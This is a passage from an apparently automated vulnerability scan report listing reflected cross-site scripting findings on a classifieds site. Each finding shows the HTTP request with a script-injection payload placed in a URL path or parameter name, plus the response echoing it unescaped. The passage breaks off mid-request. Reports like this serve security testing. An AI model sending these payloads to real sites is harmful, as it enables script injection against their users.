This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-group-class_workshop9ac20"><script>alert(1)</script>238d92d6570/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:19:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:23 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-group-class_workshop9ac20"><script>alert(1)</script>238d92d6570/?mobile=1" rel="nofollow">
...[SNIP]...

1.158. http://classifieds.lycos.com/sale-tickets-group-class_workshop/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-group-class_workshop/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5dd4"><script>alert(1)</script>656971876a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-group-class_workshop/?d5dd4"><script>alert(1)</script>656971876a5=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:18:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:33 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-group-class_workshop/?d5dd4"><script>alert(1)</script>656971876a5=1&mobile=1" rel="nofollow">
...[SNIP]...

1.159. http://classifieds.lycos.com/sale-tickets-group-festival/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-group-festival/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35e81"><script>alert(1)</script>8d746e274cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-group-festival35e81"><script>alert(1)</script>8d746e274cc/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:19:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:19 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-group-festival35e81"><script>alert(1)</script>8d746e274cc/?mobile=1" rel="nofollow">
...[SNIP]...

1.160. http://classifieds.lycos.com/sale-tickets-group-festival/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-group-festival/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31701"><script>alert(1)</script>f313045580 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-group-festival/?31701"><script>alert(1)</script>f313045580=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:18:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:42 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-group-festival/?31701"><script>alert(1)</script>f313045580=1&mobile=1" rel="nofollow">
...[SNIP]...

1.161. http://classifieds.lycos.com/sale-tickets-group-food_wine/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-group-food_wine/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95ba7"><script>alert(1)</script>680b206d4c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-group-food_wine95ba7"><script>alert(1)</script>680b206d4c7/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:13 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-group-food_wine95ba7"><script>alert(1)</script>680b206d4c7/?mobile=1" rel="nofollow">
...[SNIP]...

1.162. http://classifieds.lycos.com/sale-tickets-group-food_wine/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-group-food_wine/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 603fa"><script>alert(1)</script>163ed63fbc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-group-food_wine/?603fa"><script>alert(1)</script>163ed63fbc6=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:18:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:43 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-group-food_wine/?603fa"><script>alert(1)</script>163ed63fbc6=1&mobile=1" rel="nofollow">
...[SNIP]...

1.163. http://classifieds.lycos.com/sale-tickets-group-kids_family/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-group-kids_family/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d916"><script>alert(1)</script>dba79779e48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-group-kids_family8d916"><script>alert(1)</script>dba79779e48/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:19:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:50 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-group-kids_family8d916"><script>alert(1)</script>dba79779e48/?mobile=1" rel="nofollow">
...[SNIP]...

1.164. http://classifieds.lycos.com/sale-tickets-group-kids_family/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-group-kids_family/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8225"><script>alert(1)</script>9121761921e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-group-kids_family/?b8225"><script>alert(1)</script>9121761921e=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:19:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:03 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-group-kids_family/?b8225"><script>alert(1)</script>9121761921e=1&mobile=1" rel="nofollow">
...[SNIP]...

1.165. http://classifieds.lycos.com/sale-tickets-sports/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-sports/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c609a"><script>alert(1)</script>d802a3c643d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-sportsc609a"><script>alert(1)</script>d802a3c643d/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:19:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:32 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-sportsc609a"><script>alert(1)</script>d802a3c643d/?mobile=1" rel="nofollow">
...[SNIP]...

1.166. http://classifieds.lycos.com/sale-tickets-sports/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-sports/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c809"><script>alert(1)</script>a13e3fef637 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-sports/?5c809"><script>alert(1)</script>a13e3fef637=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:18:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:48 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-sports/?5c809"><script>alert(1)</script>a13e3fef637=1&mobile=1" rel="nofollow">
...[SNIP]...

1.167. http://classifieds.lycos.com/sale-tickets-theater/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-theater/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 939ca"><script>alert(1)</script>a0a874e0f75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-theater939ca"><script>alert(1)</script>a0a874e0f75/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:19:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:43 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-theater939ca"><script>alert(1)</script>a0a874e0f75/?mobile=1" rel="nofollow">
...[SNIP]...

1.168. http://classifieds.lycos.com/sale-tickets-theater/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets-theater/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df2c3"><script>alert(1)</script>40ff8ae0192 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets-theater/?df2c3"><script>alert(1)</script>40ff8ae0192=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:18:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:57 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 52112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets-theater/?df2c3"><script>alert(1)</script>40ff8ae0192=1&mobile=1" rel="nofollow">
...[SNIP]...

1.169. http://classifieds.lycos.com/sale-tickets/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc66d"><script>alert(1)</script>e63e7d3e623 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-ticketsbc66d"><script>alert(1)</script>e63e7d3e623/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:19 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-ticketsbc66d"><script>alert(1)</script>e63e7d3e623/?mobile=1" rel="nofollow">
...[SNIP]...

1.170. http://classifieds.lycos.com/sale-tickets/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-tickets/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4d61"><script>alert(1)</script>4c23c20c7a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-tickets/?d4d61"><script>alert(1)</script>4c23c20c7a3=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:37 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-tickets/?d4d61"><script>alert(1)</script>4c23c20c7a3=1&mobile=1" rel="nofollow">
...[SNIP]...

1.171. http://classifieds.lycos.com/sale-toy/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-toy/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27fcc"><script>alert(1)</script>58b5ed170cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-toy27fcc"><script>alert(1)</script>58b5ed170cf/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:53:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:48 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale-toy27fcc"><script>alert(1)</script>58b5ed170cf/?mobile=1" rel="nofollow">
...[SNIP]...

1.172. http://classifieds.lycos.com/sale-toy/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale-toy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d0d7"><script>alert(1)</script>352dfe6081b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale-toy/?1d0d7"><script>alert(1)</script>352dfe6081b=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
